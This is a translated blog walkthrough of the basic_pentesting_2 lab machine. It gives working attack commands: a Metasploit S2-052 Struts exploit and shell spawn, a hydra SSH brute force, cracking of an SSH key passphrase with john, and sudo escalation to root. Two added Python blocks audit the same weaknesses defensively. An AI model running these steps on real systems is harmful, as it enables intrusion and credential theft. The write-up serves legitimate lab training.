Crappy Life Series - [One Target Machine a Day]: On a Range Full of Pitfalls, Mindset Decides the Direction of Attack: basic_pentesting_2

admin | 2022-12-19 11:19:32 | 24 views | 18,971 characters

Target machine: basic_pentesting_2

Target IP: 192.168.31.22


Yakit - Information Gathering - Vulnerability Detection

Port / fingerprint scan - [1]

Host address              Fingerprint
192.168.31.22:8009        ajp13
192.168.31.22:8080        http/tomcat[9.0.7]
192.168.31.22:139         netbios-ssn/samba
192.168.31.22:445         netbios-ssn/samba
192.168.31.22:22          linux_kernel/openssh[7.2p2]/ssh/ubuntu_linux
192.168.31.22:80          apache[2.4.18]/http/http_server[2.4.18]/ubuntu_linux

Directory scan and brute force - [2]

[11:01:15] 200 -  1KB     -/development/                                     
[11:01:19] 200 -  158B   -/index.html    

Plugin / vulnerability and risk scan - [3]

Using all the plugins bundled with Yakit, run one broad scan first, then scan again by specific focus area.


Once the scan finished, there was quite a lot:

High
| CVE-2020-1938 Apache Tomcat AJP file read and inclusion vulnerability | RCE[TOMCAT]
| Web directory brute force [Tomcat manager console exposed]: /manager/html
Medium
| http://192.168.31.22:8080/docs/realm-howto.html discloses sensitive information
| Suspected admin or login page: 192.168.31.22:8080
| Web directory brute force [Tomcat example apps exposed]: /examples/
Information disclosure
| Tomcat default page: http://192.168.31.22:8080
| Apache Tomcat: http://192.168.31.22:8080

Targeted vulnerability detection - [4]

We know it is Tomcat, so test that first; the bundled plugins did not turn up anything valuable.

It took nuclei's PoC templates to find the one hit:

CVE-2020-1938 Apache Tomcat AJP file read and inclusion vulnerability

Detailed vulnerability analysis and reproduction:

https://zhuanlan.zhihu.com/p/137527937

The conditions for this vulnerability to yield RCE are:

a file (any file) must first be uploaded under the webapps directory;

that file is then pulled in through the file inclusion to achieve RCE.

Building the file-inclusion RCE chain is hard.

First try the module in MSF as an initial attempt:

msf6 auxiliary(admin/http/tomcat_ghostcat) > run
[*] Running module against 192.168.31.22
Status Code: 200
Accept-Ranges: bytes
ETag: W/"1227-1522785376000"
Last-Modified: Tue, 03 Apr 2018 19:56:16 GMT
Content-Type: application/xml
Content-Length: 1227
<?xml version="1.0" encoding="UTF-8"?>
<!--
Licensed to the Apache Software Foundation (ASF) under one or more
contributor license agreements. See the NOTICE file distributed with
this work for additional information regarding copyright ownership.
The ASF licenses this file to You under the Apache License, Version 2.0
(the "License"); you may not use this file except in compliance with
the License. You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
-->
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee
                    http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
 version="4.0"
 metadata-complete="true">

<display-name>Welcome to Tomcat</display-name>
<description>
    Welcome to Tomcat
</description>

</web-app>

[+] 192.168.31.22:8080 - /root/.msf4/loot/20221217122115_default_192.168.31.22_WEBINFweb.xml_421403.txt
[*] Auxiliary module execution completed

As you can see, the auxiliary module auxiliary/admin/http/tomcat_ghostcat only reads files; as for the inclusion route, frankly it may well not be worth the effort.

If you really want to go this route, search GitHub for a ready-made exploit someone has written and take a look.

Consolidate and analyse the collected information - [5]

Remember the /development/ directory found earlier with Dirsearch: it contains two hint text files.

操蛋人生系列-[每日一靶机]:多元坑爹靶场下的思路决定打靶方向:basic_pentesting_2

  1. 2018-04-23: I've been messing with that struts stuff, and it's pretty cool! I think it might be neat to host that on this server too. Haven't made any real web apps yet, but I have tried that example you get to show off how it works (and it's the REST version of the example!). Oh, and right now I'm using version 2.5.12, because other versions were giving me trouble. -K

  2. 2018-04-22: SMB has been configured. -K

  3. 2018-04-21: I got Apache set up. Will put in our content later. -J

  For J:

  I've been auditing the contents of /etc/shadow to make sure we don't have any weak credentials, and I was able to crack your hash really easily. You know our password policy, so please follow it? Change that password ASAP.

  -K


Analyse carefully to find a direction - [6]

  1. Try brute-forcing Tomcat weak credentials

  2. /etc/shadow contains a weak password; a cracking tool could be tried

  3. He has recently been working on something with Struts? Search for vulnerabilities in struts REST version 2.5.12 and exploit them

  4. Ports 139 and 445 run Samba; enum4linux can enumerate data from Windows and Samba hosts

  5. CVE-2020-1938 Apache Tomcat AJP file inclusion: this can only read web.xml under WEB-INF (probably useless for what follows)

It looks like there are only two paths:

  1. Exploit the struts REST version 2.5.12 vulnerability to get a low-privilege tomcat user shell, then take it step by step

  2. Use enum4linux to scan the shares and see whether user information can be pulled out; if so, brute-force it, then log in and take it from there

Tools - Exploitation - Privilege Escalation

Tomcat weak-credential brute force


In practice the login did not succeed; the page returned 401. Forget it, screw this.

CVE-2017-9805 / S2-052 + MSF exploitation

On 5 September 2017 Apache Struts published a security bulletin: the REST plugin of Apache Struts 2 has a high-severity remote code execution vulnerability, reported by a security researcher at http://lgtm.com and assigned CVE-2017-9805 (S2-052). The XStream component of the Struts 2 REST plugin has a deserialization flaw: when XStream deserializes an XML-format request body it does not validate the content, so the flaw can be attacked remotely.

Searching for struts REST version 2.5.12 shows that the matching vulnerability is S2-052.

First check whether this path exists:

http://192.168.31.22:8080/struts2-rest-showcase-2.5.12/orders.xhtml

If the page content loads, the vulnerability is present.

Note:

  1. The reproduction tutorials found online all use the path /struts2-rest-showcase

  2. On this target the path carries an extra -2.5.12 suffix

  3. While running the MSF exploit I kept getting the damn path wrong, so I went and checked the page

  4. Then I guessed at paths, remembered there was also a version number, tried adding it, and it worked

Actually I had planned to use an exploit from one of the toolkits to pop it instantly,


but found that S2-052 has basically been dropped from the toolsets; MSF still has it, old as it is, so I just used that.

msf6 > search S2-052
msf6 > use
msf6 exploit(multi/http/struts2_rest_xstream) > show options
msf6 exploit(multi/http/struts2_rest_xstream) > set rhosts 192.168.31.2
msf6 exploit(multi/http/struts2_rest_xstream) > set TARGETURI /struts2-rest-showcase-2.5.12/orders.xhtml
msf6 exploit(multi/http/struts2_rest_xstream) > run
meterpreter > shell
Process 1309 created.
Channel 1 created.

python -c 'import pty;pty.spawn("/bin/bash")'
tomcat9@basic2:/$

With a low-privilege tomcat user shell in hand, we can take a careful look at what is reachable now.

  1. Privileges are too low to enter the root directory

    tomcat9@basic2:/$ cd /root
    cd /root
    bash: cd: /root: Permission denied
  2. There are a few users under /home; in kay's directory we find a pass.bak file

    tomcat9@basic2:/home/jan$ cd /home/kay
    cd /home/kay
    tomcat9@basic2:/home/kay$ ls
    ls
    pass.bak
  3. cat has no permission? Opening it read-only in vim works

    Password: heresareallystrongpasswordthatfollowsthepasswordpolicy$$

SSH + vim read-only, switch user, sudo privilege escalation

Log in with the kay credentials we obtained:

┌──(root㉿kali)-[~]
└─# ssh [email protected]
The authenticity of host '192.168.31.22 (192.168.31.22)' can't be established.
ED25519 key fingerprint is SHA256:XKjDkLKocbzjCch0Tpriw1PeLPuzDufTGZa4xMDA+o4.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.31.22' (ED25519) to the list of known hosts.
[email protected]'s password:
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0-119-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management:     https://landscape.canonical.com
* Support:       https://ubuntu.com/advantage

282 packages can be updated.
201 updates are security updates.


Last login: Mon Apr 23 16:04:07 2018 from 192.168.56.102
kay@basic2:~$

Same routine as always:

kay@basic2:~$ ls -al
total 48
drwxr-xr-x 5 kay kay  4096 Apr 23  2018 .
drwxr-xr-x 4 root root 4096 Apr 19  2018 ..
-rw------- 1 kay kay   756 Apr 23  2018 .bash_history
-rw-r--r-- 1 kay kay   220 Apr 17  2018 .bash_logout
-rw-r--r-- 1 kay kay  3771 Apr 17  2018 .bashrc
drwx------ 2 kay kay  4096 Apr 17  2018 .cache
-rw------- 1 root kay   119 Apr 23  2018 .lesshst
drwxrwxr-x 2 kay kay  4096 Apr 23  2018 .nano
-rw------- 1 kay kay    57 Apr 23  2018 pass.bak
-rw-r--r-- 1 kay kay   655 Apr 17  2018 .profile
drwxr-xr-x 2 kay kay  4096 Apr 23  2018 .ssh
-rw-r--r-- 1 kay kay     0 Apr 17  2018 .sudo_as_admin_successful
-rw------- 1 root kay   538 Apr 23  2018 .viminfo


The directory contains a .sudo_as_admin_successful file, which Ubuntu creates when a member of the admin/sudo group has used sudo successfully, so we can switch straight to root with kay's own password.

OK, got it!

kay@basic2:~$ sudo su
root@basic2:/home/kay# whoami
root
root@basic2:/home/kay# cd /root
root@basic2:~# ls
flag.txt
root@basic2:~# cat flag.txt
Congratulations! You've completed this challenge. There are two ways (that I'm aware of) to gain
a shell, and two ways to privesc. I encourage you to find them all!

If you're in the target audience (newcomers to pentesting), I hope you learned something. A few
takeaways from this challenge should be that every little bit of information you can find can be
valuable, but sometimes you'll need to find several different pieces of information and combine
them to make them useful. Enumeration is key! Also, sometimes it's not as easy as just finding
an obviously outdated, vulnerable service right away with a port scan (unlike the first entry
in this series). Usually you'll have to dig deeper to find things that aren't as obvious, and
therefore might've been overlooked by administrators.

Thanks for taking the time to solve this VM. If you choose to create a writeup, I hope you'll send
me a link! I can be reached at josiah@vt.edu. If you've got questions or feedback, please reach
out to me.

Happy hacking!

enum4linux share enumeration

Let's broaden our view and see whether this direction also works.

Usage: enum4linux 192.168.31.22

Accessing a share from Windows:
\\ip\sharename
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sat Dec 17 22:42:35 2022

======( Target Information)=======

Target ........... 192.168.31.22
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

==( Enumerating Workgroup/Domain on 192.168.31.22 )===

[+] Got domain/workgroup name: WORKGROUP


=======( Nbtstat Information for 192.168.31.22 )=====

Looking up status of 192.168.31.22
      BASIC2         <00> -         B <ACTIVE> Workstation Service
      BASIC2         <03> -         B <ACTIVE> Messenger Service
      BASIC2         <20> -         B <ACTIVE> File Server Service
      ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser
      WORKGROUP       <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
      WORKGROUP       <1d> -         B <ACTIVE> Master Browser
      WORKGROUP       <1e> - <GROUP> B <ACTIVE> Browser Service Elections

      MAC Address = 00-00-00-00-00-00

===( Session Check on 192.168.31.22 )===
                                                                             
[+] Server 192.168.31.22 allows sessions using username '', password ''            
=======( Getting domain SID for 192.168.31.22 )========
                                                                                                                 
Domain Name: WORKGROUP                                                                                            
Domain Sid: (NULL SID)

[+] Can't determine if host is part of domain or part of a workgroup                                              
                                                                                              
========( OS information on 192.168.31.22 )=========

[E] Can't get OS info with smbclient                                                               
[+] Got OS info for 192.168.31.22 from srvinfo:                                                                  
      BASIC2         Wk Sv PrQ Unx NT SNT Samba Server 4.3.11-Ubuntu                                            
      platform_id     :       500
      os version     :       6.1
      server type     :       0x809a03
======( Users on 192.168.31.22 )===========
                                                                                                                 
Use of uninitialized value $users in print at ./enum4linux.pl line 972.                                          
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 975.

Use of uninitialized value $users in print at ./enum4linux.pl line 986.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 988.
==========( Share Enumeration on 192.168.31.22 )==============
                                                                                                               
      Sharename       Type     Comment
       ---------       ----      -------
      Anonymous       Disk      
      IPC$           IPC       IPC Service (Samba Server 4.3.11-Ubuntu)
Reconnecting with SMB1 for workgroup listing.

      Server               Comment
       ---------            -------

      Workgroup           Master
       ---------            -------
      WORKGROUP           BASIC2

[+] Attempting to map shares on 192.168.31.22                                                                                                                                                           
//192.168.31.22/Anonymous       Mapping: OK Listing: OK Writing: N/A          
[E] Can't understand response:                                                                                   

NT_STATUS_OBJECT_NAME_NOT_FOUND listing *                                                                        
//192.168.31.22/IPC$   Mapping: N/A Listing: N/A Writing: N/A
=========( Password Policy Information for 192.168.31.22 )=========

[+] Attaching to 192.168.31.22 using a NULL share

[+] Trying protocol 139/SMB...

[+] Found domain(s):

      [+] BASIC2
      [+] Builtin

[+] Password Info for Domain: BASIC2

      [+] Minimum password length: 5
      [+] Password history length: None
      [+] Maximum password age: 37 days 6 hours 21 minutes
      [+] Password Complexity Flags: 000000

              [+] Domain Refuse Password Change: 0
              [+] Domain Password Store Cleartext: 0
              [+] Domain Password Lockout Admins: 0
              [+] Domain Password No Clear Change: 0
              [+] Domain Password No Anon Change: 0
              [+] Domain Password Complex: 0

      [+] Minimum password age: None
      [+] Reset Account Lockout Counter: 30 minutes
      [+] Locked Account Duration: 30 minutes
      [+] Account Lockout Threshold: None
      [+] Forced Log off Time: 37 days 6 hours 21 minutes



[+] Retieved partial password policy with rpcclient:                                                              

Password Complexity: Disabled                                                                                    
Minimum Password Length: 5


========( Groups on 192.168.31.22 )==============

[+] Getting builtin groups:                                                                            

[+] Getting builtin group memberships:                                                                                                                                                      
[+] Getting local groups:                                                                                                                                                                                
[+] Getting local group memberships:                                                                                                                                                
[+] Getting domain groups:                                                                          
[+] Getting domain group memberships:                                                                           

==( Users on 192.168.31.22 via RID cycling (RIDS: 500-550,1000-1050) )==

[I] Found new SID:                                                                                                
S-1-22-1                                                                                                
[I] Found new SID:                                                                                                
S-1-5-32                                                                                                
[I] Found new SID:                                                                                                
S-1-5-32                                                                                                
[I] Found new SID:                                                                                                
S-1-5-32                                                                                                  

[I] Found new SID:                                                                                                
S-1-5-32                                                                                                
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''  
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)

[+] Enumerating users using SID S-1-5-21-2853212168-2008227510-3551253869 and logon username '', password ''      
                                                                                                              
S-1-5-21-2853212168-2008227510-3551253869-501 BASIC2\nobody (Local User)
S-1-5-21-2853212168-2008227510-3551253869-513 BASIC2\None (Domain Group)

[+] Enumerating users using SID S-1-22-1 and logon username '', password ''                                                                                                
S-1-22-1-1000 Unix User\kay (Local User)
S-1-22-1-1001 Unix User\jan (Local User)
=====( Getting printer info for 192.168.31.22 )=======
No printers returned.                                                                                  
enum4linux complete on Sat Dec 17 22:42:44 2022

That left me a bit dazed... let's pull out the useful information.

There are two users:

S-1-22-1-1000 Unix User\kay (Local User)
S-1-22-1-1001 Unix User\jan (Local User)

I can't make out much else, so the next goal is clear:

Try brute-forcing these two users; let's start with jan.
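Rather than reading the enum4linux dump by eye, the fields that matter can be extracted mechanically. The following is an added example, not part of the original write-up: a small parser run against a constructed sample made from the output lines shown above (the null-session line, share mapping, password policy and RID-cycling results). It pulls out the local Unix users and turns the policy fields into the list of weaknesses a defender of this Samba host would remediate (null sessions, an anonymously listable share, account names leaking through RID cycling, minimum length 5, complexity off, no lockout threshold).

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample: the relevant lines from the enum4linux run above, so the
# parser runs offline. Whitespace is as enum4linux prints it.
SAMPLE_OUTPUT = """\
[+] Server 192.168.31.22 allows sessions using username '', password ''
      BASIC2         Wk Sv PrQ Unx NT SNT Samba Server 4.3.11-Ubuntu
      Sharename       Type     Comment
       ---------       ----      -------
      Anonymous       Disk
      IPC$           IPC       IPC Service (Samba Server 4.3.11-Ubuntu)
//192.168.31.22/Anonymous       Mapping: OK Listing: OK Writing: N/A
//192.168.31.22/IPC$   Mapping: N/A Listing: N/A Writing: N/A
      [+] Minimum password length: 5
      [+] Password Complexity Flags: 000000
      [+] Account Lockout Threshold: None
S-1-5-32-544 BUILTIN\\Administrators (Local Group)
S-1-5-21-2853212168-2008227510-3551253869-501 BASIC2\\nobody (Local User)
S-1-22-1-1000 Unix User\\kay (Local User)
S-1-22-1-1001 Unix User\\jan (Local User)
"""


@dataclass
class Enum4linuxFindings:
    null_session: bool = False
    unix_users: List[str] = field(default_factory=list)
    anonymous_shares: List[str] = field(default_factory=list)
    min_password_length: Optional[int] = None
    complexity_enabled: Optional[bool] = None
    lockout_threshold: Optional[str] = None

    def weaknesses(self) -> List[str]:
        """Turn the parsed fields into the items a defender would remediate."""
        issues = []
        if self.null_session:
            issues.append("SMB accepts null (anonymous) sessions")
        for share in self.anonymous_shares:
            issues.append(f"share '{share}' is listable without credentials")
        if self.unix_users:
            issues.append("local account names exposed via RID cycling: "
                          + ", ".join(self.unix_users))
        if self.min_password_length is not None and self.min_password_length < 8:
            issues.append(f"minimum password length is {self.min_password_length}")
        if self.complexity_enabled is False:
            issues.append("password complexity is disabled")
        if self.lockout_threshold == "None":
            issues.append("no account lockout threshold (online guessing is unthrottled)")
        return issues


# S-1-22-1 is the Unix-users authority Samba uses for local POSIX accounts.
_UNIX_USER = re.compile(r"^S-1-22-1-\d+ Unix User\\(\S+) \(Local User\)", re.M)
# A share whose mapping AND listing succeeded with the empty credentials.
_OPEN_SHARE = re.compile(r"^//[^/\s]+/(\S+)\s+Mapping: OK Listing: OK", re.M)
_MIN_LEN = re.compile(r"Minimum password length: (\d+)")
_COMPLEXITY = re.compile(r"Password Complexity Flags: (\d+)")
_LOCKOUT = re.compile(r"Account Lockout Threshold: (.+?)\s*$", re.M)


def parse_enum4linux(text: str) -> Enum4linuxFindings:
    """Parse raw enum4linux output into structured findings."""
    f = Enum4linuxFindings()
    f.null_session = "allows sessions using username '', password ''" in text
    f.unix_users = _UNIX_USER.findall(text)
    f.anonymous_shares = _OPEN_SHARE.findall(text)
    m = _MIN_LEN.search(text)
    if m:
        f.min_password_length = int(m.group(1))
    m = _COMPLEXITY.search(text)
    if m:
        # All-zero flags mean no complexity requirement
        # (matches "Domain Password Complex: 0" in the output above).
        f.complexity_enabled = int(m.group(1)) != 0
    m = _LOCKOUT.search(text)
    if m:
        f.lockout_threshold = m.group(1)
    return f


if __name__ == "__main__":
    findings = parse_enum4linux(SAMPLE_OUTPUT)
    print("users:", findings.unix_users)
    for issue in findings.weaknesses():
        print("-", issue)
```

Pointing `parse_enum4linux` at a saved real run (`enum4linux target > out.txt`) works the same way; the regexes only depend on the line shapes enum4linux prints.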

Brute-forcing the SSH password with hydra

/usr/share/wordlists/rockyou.txt is a pretty big wordlist, hmm

hydra -l jan -P /usr/share/wordlists/rockyou.txt 192.168.31.22 ssh


Got the password armando for user jan

SSH + vim read-only, switch user, sudo privilege escalation


From this point the steps are essentially the same.

find / -perm -4000 2>/dev/null

The output shows that /usr/bin/vim.basic has the SUID bit set.

This means that when vim is run by an unprivileged user, it can read and write all sorts of sensitive and critical files.

Use vim to read pass.bak, then log in as kay and escalate with sudo.

jan@basic2:/home/kay$ sudo -l
[sudo] password for jan:
Sorry, user jan may not run sudo on basic2.

Note that the jan user has no sudo rights.

Obtaining login credentials from the SSH key pair

Look closely: the hidden directory /home/kay/.ssh holds the SSH public and private keys, a detail that is easy to overlook.


jan@basic2:/home/kay$ cd .ssh/
jan@basic2:/home/kay/.ssh$ ls

authorized_keys id_rsa id_rsa.pub
jan@basic2:/home/kay/.ssh$ cat at id_rsa

cat: at: No such file or directory
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,6ABA7DE35CDB65070B92C1F760E2FE75
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-----END RSA PRIVATE KEY-----

From the image you can see the file contains an RSA private key, which may be kay's password.
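The two misconfigurations that hand jan the kay account, the SUID bit on /usr/bin/vim.basic noted above and a private key sitting in a world-readable ~/.ssh next to a plaintext pass.bak, are exactly what a host-hardening check should catch. The following is an added example, not part of the original write-up: a Python audit that classifies filesystem entries by name and mode bits, run here against a constructed replica of /home/kay built in a temporary directory (the file contents are placeholders). On a real host `audit_tree` would be pointed at /home and `findings_for` fed the paths from the `find / -perm -4000` output.

```python
import os
import stat
import tempfile
from typing import List, Tuple

# Private-key file names as created by ssh-keygen.
PRIVATE_KEY_NAMES = {"id_rsa", "id_dsa", "id_ecdsa", "id_ed25519"}
# Editors/pagers that open arbitrary files: they must never carry the SUID bit.
SUID_RISKY_TOOLS = {"vi", "vim", "vim.basic", "nano", "less"}

MSG_KEY_EXPOSED = "private key is readable by group/others"
MSG_SSH_DIR_OPEN = ".ssh directory is accessible by group/others"
MSG_CRED_BACKUP = "plaintext credential/backup file in home directory"
MSG_SUID_TOOL = "SUID bit on an editor/pager (arbitrary file read/write as owner)"


def findings_for(path: str, mode: int) -> List[str]:
    """Pure classifier: given a path and its st_mode, return the findings."""
    name = os.path.basename(path)
    group_other = mode & 0o077  # any permission bit for group or others
    out: List[str] = []
    if stat.S_ISDIR(mode):
        if name == ".ssh" and group_other:
            out.append(MSG_SSH_DIR_OPEN)
        return out
    if not stat.S_ISREG(mode):
        return out
    if name in PRIVATE_KEY_NAMES and group_other:
        out.append(MSG_KEY_EXPOSED)
    # pass.bak on the target: a password kept in a backup file, whatever its mode.
    if name.endswith(".bak") and "pass" in name.lower():
        out.append(MSG_CRED_BACKUP)
    if (mode & stat.S_ISUID) and name in SUID_RISKY_TOOLS:
        out.append(MSG_SUID_TOOL)
    return out


def audit_tree(root: str) -> List[Tuple[str, str]]:
    """Walk a directory tree and collect (path, finding) pairs."""
    results: List[Tuple[str, str]] = []
    for dirpath, dirnames, filenames in os.walk(root):
        for entry in dirnames + filenames:
            full = os.path.join(dirpath, entry)
            mode = os.lstat(full).st_mode  # lstat: do not follow symlinks
            for msg in findings_for(full, mode):
                results.append((full, msg))
    return sorted(results)


def build_demo_home() -> str:
    """Constructed replica of /home/kay as listed on the target (placeholder contents)."""
    root = tempfile.mkdtemp(prefix="audit_demo_")
    kay = os.path.join(root, "kay")
    os.makedirs(os.path.join(kay, ".ssh"))
    os.chmod(os.path.join(kay, ".ssh"), 0o755)  # drwxr-xr-x, as on the box
    for name in ("id_rsa", "id_rsa.pub", "authorized_keys"):
        p = os.path.join(kay, ".ssh", name)
        with open(p, "w") as fh:
            fh.write("constructed placeholder\n")
        os.chmod(p, 0o644)  # jan could cat id_rsa, so it was readable by others
    p = os.path.join(kay, "pass.bak")
    with open(p, "w") as fh:
        fh.write("constructed placeholder\n")
    os.chmod(p, 0o600)  # -rw------- as listed, still a credential in a file
    return root


if __name__ == "__main__":
    for path, msg in audit_tree(build_demo_home()):
        print(f"{msg}: {path}")
    # SUID check on a mode taken from the find output, without needing root.
    print(findings_for("/usr/bin/vim.basic", stat.S_IFREG | stat.S_ISUID | 0o755))
```

The fix for each finding is the obvious one: `chmod 700 ~/.ssh` and `chmod 600` on private keys, no passwords in backup files at all, and `chmod u-s /usr/bin/vim.basic` (editors gain nothing legitimate from SUID).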

Copy the RSA key, create a new file called key on the desktop and paste the key into it.

Use ssh2john to convert the key into a format John the Ripper can crack.

Using the command

ssh2john key > sshkey

or equivalently

python /usr/share/john/ssh2john.py key > sshkey


then crack the key:

john sshkey

John recovers the passphrase beeswax, so we now have credentials to log in as kay.


Go back, as jan, to the folder containing the RSA key, then switch to kay with the following command:

ssh -i id_rsa [email protected]
jan@basic2:/home/kay/.ssh$ ssh -i id_rsa [email protected]

Could not create directory '/home/jan/.ssh'.
The authenticity of host '192.168.31.22 (192.168.31.22)' can't be established.
ECDSA key fingerprint is SHA256:+Fk53V/LB+2pn4OPL7GN/DuVHVvO0lT9N4W5ifchySQ.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/home/jan/.ssh/known_hosts).
Enter passphrase for key 'id_rsa': beeswax
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0-119-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management:     https://landscape.canonical.com
* Support:       https://ubuntu.com/advantage

282 packages can be updated.
201 updates are security updates.

New release '18.04.6 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

Last login: Sat Dec 17 22:37:04 2022 from 192.168.31.19
kay@basic2:~$

OK, let's stop here; the remaining steps are the same as before.

One more note:

Earlier I said you have to go back, as jan, to the folder containing the RSA key and then switch to kay.

In fact you don't need to return to that folder under jan; just run

chmod 700 key

to give the private key file permissions ssh will accept, then

ssh -i key [email protected]

to connect.

Summary - Lessons Learned - Ji Ni Tai Mei

This target is about medium difficulty, though there really are a lot of pitfalls. As I always say:

The depth of your information gathering determines the breadth of your vulnerability discovery and exploitation.

Originally published on the WeChat public account 猫因的安全: 操蛋人生系列-[每日一靶机]:多元坑爹靶场下的思路决定打靶方向:basic_pentesting_2

Reposted by CN-SEC中文网 on 2022-12-19 11:19:32: https://cn-sec.com/archives/1471412.html